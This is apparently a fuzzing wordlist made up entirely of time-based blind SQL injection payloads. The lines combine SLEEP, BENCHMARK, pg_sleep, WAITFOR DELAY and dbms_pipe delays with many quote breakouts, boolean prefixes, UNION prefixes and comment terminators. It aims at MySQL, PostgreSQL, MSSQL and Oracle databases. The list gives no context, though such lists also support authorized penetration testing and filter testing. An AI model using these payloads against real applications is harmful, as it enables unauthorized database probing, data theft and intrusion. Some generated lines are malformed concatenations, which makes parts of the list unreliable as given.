 SLEEP(20) /*' or SLEEP(20) or '" or SLEEP(20) or "*/
 SLEEP(20) /*' or SLEEP(20) or '" or SLEEP(20) or "*/
 IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(20))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(20)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),​SLEEP(20)))OR"*/
 AnD SELECT SLEEP(20)
 AnD SELECT SLEEP(20) 
 AnD SELECT SLEEP(20)"
 AnD SELECT SLEEP(20)#
 AnD SELECT SLEEP(20)'
 AnD SELECT SLEEP(20))"
 AnD SELECT SLEEP(20))'
 AnD SELECT SLEEP(20)--
 AnD SELECT SLEEP(20)-- -
 AnD SELECT SLEEP(20)/*
 AnD SELECT SLEEP(20);#
 AnD SELECT SLEEP(20);%00
 AnD SELECT SLEEP(20);--
 AnD SELECT SLEEP(20);-- -
 AnD SELECT SLEEP(20);/*
 AnD SELECT pg_sleep(20)
 AnD SELECT pg_sleep(20) 
 AnD SELECT pg_sleep(20)"
 AnD SELECT pg_sleep(20)#
 AnD SELECT pg_sleep(20)'
 AnD SELECT pg_sleep(20))"
 AnD SELECT pg_sleep(20))'
 AnD SELECT pg_sleep(20)--
 AnD SELECT pg_sleep(20)-- -
 AnD SELECT pg_sleep(20)/*
 AnD SELECT pg_sleep(20);#
 AnD SELECT pg_sleep(20);%00
 AnD SELECT pg_sleep(20);--
 AnD SELECT pg_sleep(20);-- -
 AnD SELECT pg_sleep(20);/*
 AnD WAITFOR DELAY '0:0:20'
 AnD WAITFOR DELAY '0:0:20' 
 AnD WAITFOR DELAY '0:0:20'"
 AnD WAITFOR DELAY '0:0:20'#
 AnD WAITFOR DELAY '0:0:20''
 AnD WAITFOR DELAY '0:0:20')"
 AnD WAITFOR DELAY '0:0:20')'
 AnD WAITFOR DELAY '0:0:20'--
 AnD WAITFOR DELAY '0:0:20'-- -
 AnD WAITFOR DELAY '0:0:20'/*
 AnD WAITFOR DELAY '0:0:20';#
 AnD WAITFOR DELAY '0:0:20';%00
 AnD WAITFOR DELAY '0:0:20';--
 AnD WAITFOR DELAY '0:0:20';-- -
 AnD WAITFOR DELAY '0:0:20';/*
 AnD dbms_pipe.receive_message(('a'),20)
 AnD dbms_pipe.receive_message(('a'),20) 
 AnD dbms_pipe.receive_message(('a'),20)"
 AnD dbms_pipe.receive_message(('a'),20)#
 AnD dbms_pipe.receive_message(('a'),20)'
 AnD dbms_pipe.receive_message(('a'),20))"
 AnD dbms_pipe.receive_message(('a'),20))'
 AnD dbms_pipe.receive_message(('a'),20)--
 AnD dbms_pipe.receive_message(('a'),20)-- -
 AnD dbms_pipe.receive_message(('a'),20)/*
 AnD dbms_pipe.receive_message(('a'),20);#
 AnD dbms_pipe.receive_message(('a'),20);%00
 AnD dbms_pipe.receive_message(('a'),20);--
 AnD dbms_pipe.receive_message(('a'),20);-- -
 AnD dbms_pipe.receive_message(('a'),20);/*
 SELECT SLEEP(20)
 SELECT SLEEP(20) 
 SELECT SLEEP(20)"
 SELECT SLEEP(20)#
 SELECT SLEEP(20)'
 SELECT SLEEP(20))"
 SELECT SLEEP(20))'
 SELECT SLEEP(20)--
 SELECT SLEEP(20)-- -
 SELECT SLEEP(20)/*
 SELECT SLEEP(20);#
 SELECT SLEEP(20);%00
 SELECT SLEEP(20);--
 SELECT SLEEP(20);-- -
 SELECT SLEEP(20);/*
 SELECT pg_sleep(20)
 SELECT pg_sleep(20) 
 SELECT pg_sleep(20)"
 SELECT pg_sleep(20)#
 SELECT pg_sleep(20)'
 SELECT pg_sleep(20))"
 SELECT pg_sleep(20))'
 SELECT pg_sleep(20)--
 SELECT pg_sleep(20)-- -
 SELECT pg_sleep(20)/*
 SELECT pg_sleep(20);#
 SELECT pg_sleep(20);%00
 SELECT pg_sleep(20);--
 SELECT pg_sleep(20);-- -
 SELECT pg_sleep(20);/*
 WAITFOR DELAY '0:0:20'
 WAITFOR DELAY '0:0:20' 
 WAITFOR DELAY '0:0:20'"
 WAITFOR DELAY '0:0:20'#
 WAITFOR DELAY '0:0:20''
 WAITFOR DELAY '0:0:20')"
 WAITFOR DELAY '0:0:20')'
 WAITFOR DELAY '0:0:20'--
 WAITFOR DELAY '0:0:20'-- -
 WAITFOR DELAY '0:0:20'/*
 WAITFOR DELAY '0:0:20';#
 WAITFOR DELAY '0:0:20';%00
 WAITFOR DELAY '0:0:20';--
 WAITFOR DELAY '0:0:20';-- -
 WAITFOR DELAY '0:0:20';/*
 WhErE SELECT SLEEP(20)
 WhErE SELECT SLEEP(20) 
 WhErE SELECT SLEEP(20)"
 WhErE SELECT SLEEP(20)#
 WhErE SELECT SLEEP(20)'
 WhErE SELECT SLEEP(20))"
 WhErE SELECT SLEEP(20))'
 WhErE SELECT SLEEP(20)--
 WhErE SELECT SLEEP(20)-- -
 WhErE SELECT SLEEP(20)/*
 WhErE SELECT SLEEP(20);#
 WhErE SELECT SLEEP(20);%00
 WhErE SELECT SLEEP(20);--
 WhErE SELECT SLEEP(20);-- -
 WhErE SELECT SLEEP(20);/*
 WhErE SELECT pg_sleep(20)
 WhErE SELECT pg_sleep(20) 
 WhErE SELECT pg_sleep(20)"
 WhErE SELECT pg_sleep(20)#
 WhErE SELECT pg_sleep(20)'
 WhErE SELECT pg_sleep(20))"
 WhErE SELECT pg_sleep(20))'
 WhErE SELECT pg_sleep(20)--
 WhErE SELECT pg_sleep(20)-- -
 WhErE SELECT pg_sleep(20)/*
 WhErE SELECT pg_sleep(20);#
 WhErE SELECT pg_sleep(20);%00
 WhErE SELECT pg_sleep(20);--
 WhErE SELECT pg_sleep(20);-- -
 WhErE SELECT pg_sleep(20);/*
 WhErE WAITFOR DELAY '0:0:20'
 WhErE WAITFOR DELAY '0:0:20' 
 WhErE WAITFOR DELAY '0:0:20'"
 WhErE WAITFOR DELAY '0:0:20'#
 WhErE WAITFOR DELAY '0:0:20''
 WhErE WAITFOR DELAY '0:0:20')"
 WhErE WAITFOR DELAY '0:0:20')'
 WhErE WAITFOR DELAY '0:0:20'--
 WhErE WAITFOR DELAY '0:0:20'-- -
 WhErE WAITFOR DELAY '0:0:20'/*
 WhErE WAITFOR DELAY '0:0:20';#
 WhErE WAITFOR DELAY '0:0:20';%00
 WhErE WAITFOR DELAY '0:0:20';--
 WhErE WAITFOR DELAY '0:0:20';-- -
 WhErE WAITFOR DELAY '0:0:20';/*
 WhErE dbms_pipe.receive_message(('a'),20)
 WhErE dbms_pipe.receive_message(('a'),20) 
 WhErE dbms_pipe.receive_message(('a'),20)"
 WhErE dbms_pipe.receive_message(('a'),20)#
 WhErE dbms_pipe.receive_message(('a'),20)'
 WhErE dbms_pipe.receive_message(('a'),20))"
 WhErE dbms_pipe.receive_message(('a'),20))'
 WhErE dbms_pipe.receive_message(('a'),20)--
 WhErE dbms_pipe.receive_message(('a'),20)-- -
 WhErE dbms_pipe.receive_message(('a'),20)/*
 WhErE dbms_pipe.receive_message(('a'),20);#
 WhErE dbms_pipe.receive_message(('a'),20);%00
 WhErE dbms_pipe.receive_message(('a'),20);--
 WhErE dbms_pipe.receive_message(('a'),20);-- -
 WhErE dbms_pipe.receive_message(('a'),20);/*
 dbms_pipe.receive_message(('a'),20)
 dbms_pipe.receive_message(('a'),20) 
 dbms_pipe.receive_message(('a'),20)"
 dbms_pipe.receive_message(('a'),20)#
 dbms_pipe.receive_message(('a'),20)'
 dbms_pipe.receive_message(('a'),20))"
 dbms_pipe.receive_message(('a'),20))'
 dbms_pipe.receive_message(('a'),20)--
 dbms_pipe.receive_message(('a'),20)-- -
 dbms_pipe.receive_message(('a'),20)/*
 dbms_pipe.receive_message(('a'),20);#
 dbms_pipe.receive_message(('a'),20);%00
 dbms_pipe.receive_message(('a'),20);--
 dbms_pipe.receive_message(('a'),20);-- -
 dbms_pipe.receive_message(('a'),20);/*
 oR SELECT SLEEP(20)
 oR SELECT SLEEP(20) 
 oR SELECT SLEEP(20)"
 oR SELECT SLEEP(20)#
 oR SELECT SLEEP(20)'
 oR SELECT SLEEP(20))"
 oR SELECT SLEEP(20))'
 oR SELECT SLEEP(20)--
 oR SELECT SLEEP(20)-- -
 oR SELECT SLEEP(20)/*
 oR SELECT SLEEP(20);#
 oR SELECT SLEEP(20);%00
 oR SELECT SLEEP(20);--
 oR SELECT SLEEP(20);-- -
 oR SELECT SLEEP(20);/*
 oR SELECT pg_sleep(20)
 oR SELECT pg_sleep(20) 
 oR SELECT pg_sleep(20)"
 oR SELECT pg_sleep(20)#
 oR SELECT pg_sleep(20)'
 oR SELECT pg_sleep(20))"
 oR SELECT pg_sleep(20))'
 oR SELECT pg_sleep(20)--
 oR SELECT pg_sleep(20)-- -
 oR SELECT pg_sleep(20)/*
 oR SELECT pg_sleep(20);#
 oR SELECT pg_sleep(20);%00
 oR SELECT pg_sleep(20);--
 oR SELECT pg_sleep(20);-- -
 oR SELECT pg_sleep(20);/*
 oR WAITFOR DELAY '0:0:20'
 oR WAITFOR DELAY '0:0:20' 
 oR WAITFOR DELAY '0:0:20'"
 oR WAITFOR DELAY '0:0:20'#
 oR WAITFOR DELAY '0:0:20''
 oR WAITFOR DELAY '0:0:20')"
 oR WAITFOR DELAY '0:0:20')'
 oR WAITFOR DELAY '0:0:20'--
 oR WAITFOR DELAY '0:0:20'-- -
 oR WAITFOR DELAY '0:0:20'/*
 oR WAITFOR DELAY '0:0:20';#
 oR WAITFOR DELAY '0:0:20';%00
 oR WAITFOR DELAY '0:0:20';--
 oR WAITFOR DELAY '0:0:20';-- -
 oR WAITFOR DELAY '0:0:20';/*
 oR dbms_pipe.receive_message(('a'),20)
 oR dbms_pipe.receive_message(('a'),20) 
 oR dbms_pipe.receive_message(('a'),20)"
 oR dbms_pipe.receive_message(('a'),20)#
 oR dbms_pipe.receive_message(('a'),20)'
 oR dbms_pipe.receive_message(('a'),20))"
 oR dbms_pipe.receive_message(('a'),20))'
 oR dbms_pipe.receive_message(('a'),20)--
 oR dbms_pipe.receive_message(('a'),20)-- -
 oR dbms_pipe.receive_message(('a'),20)/*
 oR dbms_pipe.receive_message(('a'),20);#
 oR dbms_pipe.receive_message(('a'),20);%00
 oR dbms_pipe.receive_message(('a'),20);--
 oR dbms_pipe.receive_message(('a'),20);-- -
 oR dbms_pipe.receive_message(('a'),20);/*
"(SELECT SLEEP(20)
"(SELECT SLEEP(20) 
"(SELECT SLEEP(20)"
"(SELECT SLEEP(20)#
"(SELECT SLEEP(20)'
"(SELECT SLEEP(20))"
"(SELECT SLEEP(20))'
"(SELECT SLEEP(20)--
"(SELECT SLEEP(20)-- -
"(SELECT SLEEP(20)/*
"(SELECT SLEEP(20);#
"(SELECT SLEEP(20);%00
"(SELECT SLEEP(20);--
"(SELECT SLEEP(20);-- -
"(SELECT SLEEP(20);/*
"(SELECT pg_sleep(20)
"(SELECT pg_sleep(20) 
"(SELECT pg_sleep(20)"
"(SELECT pg_sleep(20)#
"(SELECT pg_sleep(20)'
"(SELECT pg_sleep(20))"
"(SELECT pg_sleep(20))'
"(SELECT pg_sleep(20)--
"(SELECT pg_sleep(20)-- -
"(SELECT pg_sleep(20)/*
"(SELECT pg_sleep(20);#
"(SELECT pg_sleep(20);%00
"(SELECT pg_sleep(20);--
"(SELECT pg_sleep(20);-- -
"(SELECT pg_sleep(20);/*
"(WAITFOR DELAY '0:0:20'
"(WAITFOR DELAY '0:0:20' 
"(WAITFOR DELAY '0:0:20'"
"(WAITFOR DELAY '0:0:20'#
"(WAITFOR DELAY '0:0:20''
"(WAITFOR DELAY '0:0:20')"
"(WAITFOR DELAY '0:0:20')'
"(WAITFOR DELAY '0:0:20'--
"(WAITFOR DELAY '0:0:20'-- -
"(WAITFOR DELAY '0:0:20'/*
"(WAITFOR DELAY '0:0:20';#
"(WAITFOR DELAY '0:0:20';%00
"(WAITFOR DELAY '0:0:20';--
"(WAITFOR DELAY '0:0:20';-- -
"(WAITFOR DELAY '0:0:20';/*
"(dbms_pipe.receive_message(('a'),20)
"(dbms_pipe.receive_message(('a'),20) 
"(dbms_pipe.receive_message(('a'),20)"
"(dbms_pipe.receive_message(('a'),20)#
"(dbms_pipe.receive_message(('a'),20)'
"(dbms_pipe.receive_message(('a'),20))"
"(dbms_pipe.receive_message(('a'),20))'
"(dbms_pipe.receive_message(('a'),20)--
"(dbms_pipe.receive_message(('a'),20)-- -
"(dbms_pipe.receive_message(('a'),20)/*
"(dbms_pipe.receive_message(('a'),20);#
"(dbms_pipe.receive_message(('a'),20);%00
"(dbms_pipe.receive_message(('a'),20);--
"(dbms_pipe.receive_message(('a'),20);-- -
"(dbms_pipe.receive_message(('a'),20);/*
");SELECT SLEEP(20)
");SELECT SLEEP(20) 
");SELECT SLEEP(20)"
");SELECT SLEEP(20)#
");SELECT SLEEP(20)'
");SELECT SLEEP(20))"
");SELECT SLEEP(20))'
");SELECT SLEEP(20)--
");SELECT SLEEP(20)-- -
");SELECT SLEEP(20)/*
");SELECT SLEEP(20);#
");SELECT SLEEP(20);%00
");SELECT SLEEP(20);--
");SELECT SLEEP(20);-- -
");SELECT SLEEP(20);/*
");SELECT pg_sleep(20)
");SELECT pg_sleep(20) 
");SELECT pg_sleep(20)"
");SELECT pg_sleep(20)#
");SELECT pg_sleep(20)'
");SELECT pg_sleep(20))"
");SELECT pg_sleep(20))'
");SELECT pg_sleep(20)--
");SELECT pg_sleep(20)-- -
");SELECT pg_sleep(20)/*
");SELECT pg_sleep(20);#
");SELECT pg_sleep(20);%00
");SELECT pg_sleep(20);--
");SELECT pg_sleep(20);-- -
");SELECT pg_sleep(20);/*
");WAITFOR DELAY '0:0:20'
");WAITFOR DELAY '0:0:20' 
");WAITFOR DELAY '0:0:20'"
");WAITFOR DELAY '0:0:20'#
");WAITFOR DELAY '0:0:20''
");WAITFOR DELAY '0:0:20')"
");WAITFOR DELAY '0:0:20')'
");WAITFOR DELAY '0:0:20'--
");WAITFOR DELAY '0:0:20'-- -
");WAITFOR DELAY '0:0:20'/*
");WAITFOR DELAY '0:0:20';#
");WAITFOR DELAY '0:0:20';%00
");WAITFOR DELAY '0:0:20';--
");WAITFOR DELAY '0:0:20';-- -
");WAITFOR DELAY '0:0:20';/*
");dbms_pipe.receive_message(('a'),20)
");dbms_pipe.receive_message(('a'),20) 
");dbms_pipe.receive_message(('a'),20)"
");dbms_pipe.receive_message(('a'),20)#
");dbms_pipe.receive_message(('a'),20)'
");dbms_pipe.receive_message(('a'),20))"
");dbms_pipe.receive_message(('a'),20))'
");dbms_pipe.receive_message(('a'),20)--
");dbms_pipe.receive_message(('a'),20)-- -
");dbms_pipe.receive_message(('a'),20)/*
");dbms_pipe.receive_message(('a'),20);#
");dbms_pipe.receive_message(('a'),20);%00
");dbms_pipe.receive_message(('a'),20);--
");dbms_pipe.receive_message(('a'),20);-- -
");dbms_pipe.receive_message(('a'),20);/*
")SELECT SLEEP(20)
")SELECT SLEEP(20) 
")SELECT SLEEP(20)"
")SELECT SLEEP(20)#
")SELECT SLEEP(20)'
")SELECT SLEEP(20))"
")SELECT SLEEP(20))'
")SELECT SLEEP(20)--
")SELECT SLEEP(20)-- -
")SELECT SLEEP(20)/*
")SELECT SLEEP(20);#
")SELECT SLEEP(20);%00
")SELECT SLEEP(20);--
")SELECT SLEEP(20);-- -
")SELECT SLEEP(20);/*
")SELECT pg_sleep(20)
")SELECT pg_sleep(20) 
")SELECT pg_sleep(20)"
")SELECT pg_sleep(20)#
")SELECT pg_sleep(20)'
")SELECT pg_sleep(20))"
")SELECT pg_sleep(20))'
")SELECT pg_sleep(20)--
")SELECT pg_sleep(20)-- -
")SELECT pg_sleep(20)/*
")SELECT pg_sleep(20);#
")SELECT pg_sleep(20);%00
")SELECT pg_sleep(20);--
")SELECT pg_sleep(20);-- -
")SELECT pg_sleep(20);/*
")WAITFOR DELAY '0:0:20'
")WAITFOR DELAY '0:0:20' 
")WAITFOR DELAY '0:0:20'"
")WAITFOR DELAY '0:0:20'#
")WAITFOR DELAY '0:0:20''
")WAITFOR DELAY '0:0:20')"
")WAITFOR DELAY '0:0:20')'
")WAITFOR DELAY '0:0:20'--
")WAITFOR DELAY '0:0:20'-- -
")WAITFOR DELAY '0:0:20'/*
")WAITFOR DELAY '0:0:20';#
")WAITFOR DELAY '0:0:20';%00
")WAITFOR DELAY '0:0:20';--
")WAITFOR DELAY '0:0:20';-- -
")WAITFOR DELAY '0:0:20';/*
")dbms_pipe.receive_message(('a'),20)
")dbms_pipe.receive_message(('a'),20) 
")dbms_pipe.receive_message(('a'),20)"
")dbms_pipe.receive_message(('a'),20)#
")dbms_pipe.receive_message(('a'),20)'
")dbms_pipe.receive_message(('a'),20))"
")dbms_pipe.receive_message(('a'),20))'
")dbms_pipe.receive_message(('a'),20)--
")dbms_pipe.receive_message(('a'),20)-- -
")dbms_pipe.receive_message(('a'),20)/*
")dbms_pipe.receive_message(('a'),20);#
")dbms_pipe.receive_message(('a'),20);%00
")dbms_pipe.receive_message(('a'),20);--
")dbms_pipe.receive_message(('a'),20);-- -
")dbms_pipe.receive_message(('a'),20);/*
";)SELECT SLEEP(20)
";)SELECT SLEEP(20) 
";)SELECT SLEEP(20)"
";)SELECT SLEEP(20)#
";)SELECT SLEEP(20)'
";)SELECT SLEEP(20))"
";)SELECT SLEEP(20))'
";)SELECT SLEEP(20)--
";)SELECT SLEEP(20)-- -
";)SELECT SLEEP(20)/*
";)SELECT SLEEP(20);#
";)SELECT SLEEP(20);%00
";)SELECT SLEEP(20);--
";)SELECT SLEEP(20);-- -
";)SELECT SLEEP(20);/*
";)SELECT pg_sleep(20)
";)SELECT pg_sleep(20) 
";)SELECT pg_sleep(20)"
";)SELECT pg_sleep(20)#
";)SELECT pg_sleep(20)'
";)SELECT pg_sleep(20))"
";)SELECT pg_sleep(20))'
";)SELECT pg_sleep(20)--
";)SELECT pg_sleep(20)-- -
";)SELECT pg_sleep(20)/*
";)SELECT pg_sleep(20);#
";)SELECT pg_sleep(20);%00
";)SELECT pg_sleep(20);--
";)SELECT pg_sleep(20);-- -
";)SELECT pg_sleep(20);/*
";)WAITFOR DELAY '0:0:20'
";)WAITFOR DELAY '0:0:20' 
";)WAITFOR DELAY '0:0:20'"
";)WAITFOR DELAY '0:0:20'#
";)WAITFOR DELAY '0:0:20''
";)WAITFOR DELAY '0:0:20')"
";)WAITFOR DELAY '0:0:20')'
";)WAITFOR DELAY '0:0:20'--
";)WAITFOR DELAY '0:0:20'-- -
";)WAITFOR DELAY '0:0:20'/*
";)WAITFOR DELAY '0:0:20';#
";)WAITFOR DELAY '0:0:20';%00
";)WAITFOR DELAY '0:0:20';--
";)WAITFOR DELAY '0:0:20';-- -
";)WAITFOR DELAY '0:0:20';/*
";)dbms_pipe.receive_message(('a'),20)
";)dbms_pipe.receive_message(('a'),20) 
";)dbms_pipe.receive_message(('a'),20)"
";)dbms_pipe.receive_message(('a'),20)#
";)dbms_pipe.receive_message(('a'),20)'
";)dbms_pipe.receive_message(('a'),20))"
";)dbms_pipe.receive_message(('a'),20))'
";)dbms_pipe.receive_message(('a'),20)--
";)dbms_pipe.receive_message(('a'),20)-- -
";)dbms_pipe.receive_message(('a'),20)/*
";)dbms_pipe.receive_message(('a'),20);#
";)dbms_pipe.receive_message(('a'),20);%00
";)dbms_pipe.receive_message(('a'),20);--
";)dbms_pipe.receive_message(('a'),20);-- -
";)dbms_pipe.receive_message(('a'),20);/*
"SELECT SLEEP(20)
"SELECT SLEEP(20) 
"SELECT SLEEP(20)"
"SELECT SLEEP(20)#
"SELECT SLEEP(20)'
"SELECT SLEEP(20))"
"SELECT SLEEP(20))'
"SELECT SLEEP(20)--
"SELECT SLEEP(20)-- -
"SELECT SLEEP(20)/*
"SELECT SLEEP(20);#
"SELECT SLEEP(20);%00
"SELECT SLEEP(20);--
"SELECT SLEEP(20);-- -
"SELECT SLEEP(20);/*
"SELECT pg_sleep(20)
"SELECT pg_sleep(20) 
"SELECT pg_sleep(20)"
"SELECT pg_sleep(20)#
"SELECT pg_sleep(20)'
"SELECT pg_sleep(20))"
"SELECT pg_sleep(20))'
"SELECT pg_sleep(20)--
"SELECT pg_sleep(20)-- -
"SELECT pg_sleep(20)/*
"SELECT pg_sleep(20);#
"SELECT pg_sleep(20);%00
"SELECT pg_sleep(20);--
"SELECT pg_sleep(20);-- -
"SELECT pg_sleep(20);/*
"WAITFOR DELAY '0:0:20'
"WAITFOR DELAY '0:0:20' 
"WAITFOR DELAY '0:0:20'"
"WAITFOR DELAY '0:0:20'#
"WAITFOR DELAY '0:0:20''
"WAITFOR DELAY '0:0:20')"
"WAITFOR DELAY '0:0:20')'
"WAITFOR DELAY '0:0:20'--
"WAITFOR DELAY '0:0:20'-- -
"WAITFOR DELAY '0:0:20'/*
"WAITFOR DELAY '0:0:20';#
"WAITFOR DELAY '0:0:20';%00
"WAITFOR DELAY '0:0:20';--
"WAITFOR DELAY '0:0:20';-- -
"WAITFOR DELAY '0:0:20';/*
"dbms_pipe.receive_message(('a'),20)
"dbms_pipe.receive_message(('a'),20) 
"dbms_pipe.receive_message(('a'),20)"
"dbms_pipe.receive_message(('a'),20)#
"dbms_pipe.receive_message(('a'),20)'
"dbms_pipe.receive_message(('a'),20))"
"dbms_pipe.receive_message(('a'),20))'
"dbms_pipe.receive_message(('a'),20)--
"dbms_pipe.receive_message(('a'),20)-- -
"dbms_pipe.receive_message(('a'),20)/*
"dbms_pipe.receive_message(('a'),20);#
"dbms_pipe.receive_message(('a'),20);%00
"dbms_pipe.receive_message(('a'),20);--
"dbms_pipe.receive_message(('a'),20);-- -
"dbms_pipe.receive_message(('a'),20);/*
&&SELECT SLEEP(20)
&&SELECT SLEEP(20) 
&&SELECT SLEEP(20)"
&&SELECT SLEEP(20)#
&&SELECT SLEEP(20)'
&&SELECT SLEEP(20))"
&&SELECT SLEEP(20))'
&&SELECT SLEEP(20)--
&&SELECT SLEEP(20)-- -
&&SELECT SLEEP(20)/*
&&SELECT SLEEP(20);#
&&SELECT SLEEP(20);%00
&&SELECT SLEEP(20);--
&&SELECT SLEEP(20);-- -
&&SELECT SLEEP(20);/*
&&SELECT pg_sleep(20)
&&SELECT pg_sleep(20) 
&&SELECT pg_sleep(20)"
&&SELECT pg_sleep(20)#
&&SELECT pg_sleep(20)'
&&SELECT pg_sleep(20))"
&&SELECT pg_sleep(20))'
&&SELECT pg_sleep(20)--
&&SELECT pg_sleep(20)-- -
&&SELECT pg_sleep(20)/*
&&SELECT pg_sleep(20);#
&&SELECT pg_sleep(20);%00
&&SELECT pg_sleep(20);--
&&SELECT pg_sleep(20);-- -
&&SELECT pg_sleep(20);/*
&&WAITFOR DELAY '0:0:20'
&&WAITFOR DELAY '0:0:20' 
&&WAITFOR DELAY '0:0:20'"
&&WAITFOR DELAY '0:0:20'#
&&WAITFOR DELAY '0:0:20''
&&WAITFOR DELAY '0:0:20')"
&&WAITFOR DELAY '0:0:20')'
&&WAITFOR DELAY '0:0:20'--
&&WAITFOR DELAY '0:0:20'-- -
&&WAITFOR DELAY '0:0:20'/*
&&WAITFOR DELAY '0:0:20';#
&&WAITFOR DELAY '0:0:20';%00
&&WAITFOR DELAY '0:0:20';--
&&WAITFOR DELAY '0:0:20';-- -
&&WAITFOR DELAY '0:0:20';/*
&&dbms_pipe.receive_message(('a'),20)
&&dbms_pipe.receive_message(('a'),20) 
&&dbms_pipe.receive_message(('a'),20)"
&&dbms_pipe.receive_message(('a'),20)#
&&dbms_pipe.receive_message(('a'),20)'
&&dbms_pipe.receive_message(('a'),20))"
&&dbms_pipe.receive_message(('a'),20))'
&&dbms_pipe.receive_message(('a'),20)--
&&dbms_pipe.receive_message(('a'),20)-- -
&&dbms_pipe.receive_message(('a'),20)/*
&&dbms_pipe.receive_message(('a'),20);#
&&dbms_pipe.receive_message(('a'),20);%00
&&dbms_pipe.receive_message(('a'),20);--
&&dbms_pipe.receive_message(('a'),20);-- -
&&dbms_pipe.receive_message(('a'),20);/*
' UnIoN AlL SeLeCtSELECT SLEEP(20)
' UnIoN AlL SeLeCtSELECT SLEEP(20) 
' UnIoN AlL SeLeCtSELECT SLEEP(20)"
' UnIoN AlL SeLeCtSELECT SLEEP(20)#
' UnIoN AlL SeLeCtSELECT SLEEP(20)'
' UnIoN AlL SeLeCtSELECT SLEEP(20))"
' UnIoN AlL SeLeCtSELECT SLEEP(20))'
' UnIoN AlL SeLeCtSELECT SLEEP(20)--
' UnIoN AlL SeLeCtSELECT SLEEP(20)-- -
' UnIoN AlL SeLeCtSELECT SLEEP(20)/*
' UnIoN AlL SeLeCtSELECT SLEEP(20);#
' UnIoN AlL SeLeCtSELECT SLEEP(20);%00
' UnIoN AlL SeLeCtSELECT SLEEP(20);--
' UnIoN AlL SeLeCtSELECT SLEEP(20);-- -
' UnIoN AlL SeLeCtSELECT SLEEP(20);/*
' UnIoN AlL SeLeCtSELECT pg_sleep(20)
' UnIoN AlL SeLeCtSELECT pg_sleep(20) 
' UnIoN AlL SeLeCtSELECT pg_sleep(20)"
' UnIoN AlL SeLeCtSELECT pg_sleep(20)#
' UnIoN AlL SeLeCtSELECT pg_sleep(20)'
' UnIoN AlL SeLeCtSELECT pg_sleep(20))"
' UnIoN AlL SeLeCtSELECT pg_sleep(20))'
' UnIoN AlL SeLeCtSELECT pg_sleep(20)--
' UnIoN AlL SeLeCtSELECT pg_sleep(20)-- -
' UnIoN AlL SeLeCtSELECT pg_sleep(20)/*
' UnIoN AlL SeLeCtSELECT pg_sleep(20);#
' UnIoN AlL SeLeCtSELECT pg_sleep(20);%00
' UnIoN AlL SeLeCtSELECT pg_sleep(20);--
' UnIoN AlL SeLeCtSELECT pg_sleep(20);-- -
' UnIoN AlL SeLeCtSELECT pg_sleep(20);/*
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20'
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20' 
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20'"
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20'#
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20''
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20')"
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20')'
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20'--
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20'-- -
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20'/*
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20';#
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20';%00
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20';--
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20';-- -
' UnIoN AlL SeLeCtWAITFOR DELAY '0:0:20';/*
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20)
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20) 
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20)"
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20)#
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20)'
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20))"
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20))'
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20)--
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20)-- -
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20)/*
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20);#
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20);%00
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20);--
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20);-- -
' UnIoN AlL SeLeCtdbms_pipe.receive_message(('a'),20);/*
'(SELECT SLEEP(20)
'(SELECT SLEEP(20) 
'(SELECT SLEEP(20)"
'(SELECT SLEEP(20)#
'(SELECT SLEEP(20)'
'(SELECT SLEEP(20))"
'(SELECT SLEEP(20))'
'(SELECT SLEEP(20)--
'(SELECT SLEEP(20)-- -
'(SELECT SLEEP(20)/*
'(SELECT SLEEP(20);#
'(SELECT SLEEP(20);%00
'(SELECT SLEEP(20);--
'(SELECT SLEEP(20);-- -
'(SELECT SLEEP(20);/*
'(SELECT pg_sleep(20)
'(SELECT pg_sleep(20) 
'(SELECT pg_sleep(20)"
'(SELECT pg_sleep(20)#
'(SELECT pg_sleep(20)'
'(SELECT pg_sleep(20))"
'(SELECT pg_sleep(20))'
'(SELECT pg_sleep(20)--
'(SELECT pg_sleep(20)-- -
'(SELECT pg_sleep(20)/*
'(SELECT pg_sleep(20);#
'(SELECT pg_sleep(20);%00
'(SELECT pg_sleep(20);--
'(SELECT pg_sleep(20);-- -
'(SELECT pg_sleep(20);/*
'(WAITFOR DELAY '0:0:20'
'(WAITFOR DELAY '0:0:20' 
'(WAITFOR DELAY '0:0:20'"
'(WAITFOR DELAY '0:0:20'#
'(WAITFOR DELAY '0:0:20''
'(WAITFOR DELAY '0:0:20')"
'(WAITFOR DELAY '0:0:20')'
'(WAITFOR DELAY '0:0:20'--
'(WAITFOR DELAY '0:0:20'-- -
'(WAITFOR DELAY '0:0:20'/*
'(WAITFOR DELAY '0:0:20';#
'(WAITFOR DELAY '0:0:20';%00
'(WAITFOR DELAY '0:0:20';--
'(WAITFOR DELAY '0:0:20';-- -
'(WAITFOR DELAY '0:0:20';/*
'(dbms_pipe.receive_message(('a'),20)
